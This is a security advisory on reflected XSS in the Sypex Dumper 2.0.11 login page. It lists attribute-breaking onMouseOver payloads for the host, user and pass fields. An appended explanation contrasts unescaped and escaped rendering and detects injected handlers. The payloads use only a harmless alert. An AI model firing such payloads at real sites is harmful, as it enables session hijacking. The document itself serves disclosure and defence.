Credits: John Page ( hyp3rlinx )
Domains: hyp3rlinx.altervista.org
Source: http://hyp3rlinx.altervista.org/advisories/AS-SYPEX0529.txt

Vendor:
https://sypex.net

Product:
Sypex Dumper 2.0.11 is a PHP web based MySQL database management system.

Advisory Information:
================================================
Sypex Dumper 2.0.11 XSS Vulnerabilities

XSS Vulnerability Details:
=====================
The login page input fields are vulnerable to XSS via the POST method, allowing a remote attacker to execute arbitrary code in the context of a user's browser session.

Exploit code(s):
===============
host="onMouseOver="alert(666);
pass="onMouseOver="alert(666);
user="onMouseOver="alert(666);

Disclosure Timeline:
=========================================================
Vendor Notification: May 27, 2015
May 29, 2015: Public Disclosure

Severity Level:
=========================================================
Med

Description:
==========================================================
Request Method(s):
[+] POST

Vulnerable Product:
[+] Sypex Dumper 2.0.11

Vulnerable Parameter(s):
[+] host, pass, user

Affected Area(s):
[+] Login page

===============================================================
(hyp3rlinx)

# Iranian Exploit DataBase = http://IeDb.Ir [2015-06-12]
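The exploit strings above work because a submitted value is reflected into a value="" attribute without escaping, so the embedded quote closes the attribute and the rest becomes a new onMouseOver handler. The following is an added illustration, not Sypex Dumper's code: a constructed login form rendered once unescaped and once with attribute-safe escaping (the equivalent of PHP's htmlspecialchars with ENT_QUOTES), plus a parser-based check that reports any on* handler attribute the browser would see on the form's inputs.

```python
import html
from html.parser import HTMLParser

# Constructed payload in the same shape as the advisory's PoC strings.
PAYLOAD = '"onMouseOver="alert(666);'


def render_login_vulnerable(host: str, user: str, pw: str) -> str:
    """Reflect the POSTed values straight into the attributes (the bug)."""
    return (
        '<form method="POST">'
        f'<input name="host" value="{host}">'
        f'<input name="user" value="{user}">'
        f'<input name="pass" value="{pw}">'
        '</form>'
    )


def render_login_hardened(host: str, user: str, pw: str) -> str:
    """Same form, but every value is escaped for an attribute context
    (quotes included), so a quote in the input cannot close the attribute."""
    e = lambda v: html.escape(v, quote=True)
    return render_login_vulnerable(e(host), e(user), e(pw))


class _InputCollector(HTMLParser):
    """Collect the attribute dict of every <input> as the parser sees it."""
    def __init__(self) -> None:
        super().__init__()
        self.inputs: list[dict] = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(dict(attrs))


def parse_inputs(markup: str) -> list[dict]:
    p = _InputCollector()
    p.feed(markup)
    return p.inputs


def injected_handlers(markup: str) -> list[str]:
    """Names of event-handler attributes (on*) that ended up on any <input>."""
    return [k for inp in parse_inputs(markup) for k in inp if k.startswith("on")]


if __name__ == "__main__":
    print("vulnerable:", injected_handlers(render_login_vulnerable(PAYLOAD, "root", "x")))
    print("hardened:  ", injected_handlers(render_login_hardened(PAYLOAD, "root", "x")))
```

The hardened render keeps the submitted text intact as the attribute's value (the parser decodes &quot; back to a quote) while leaving no handler attribute behind.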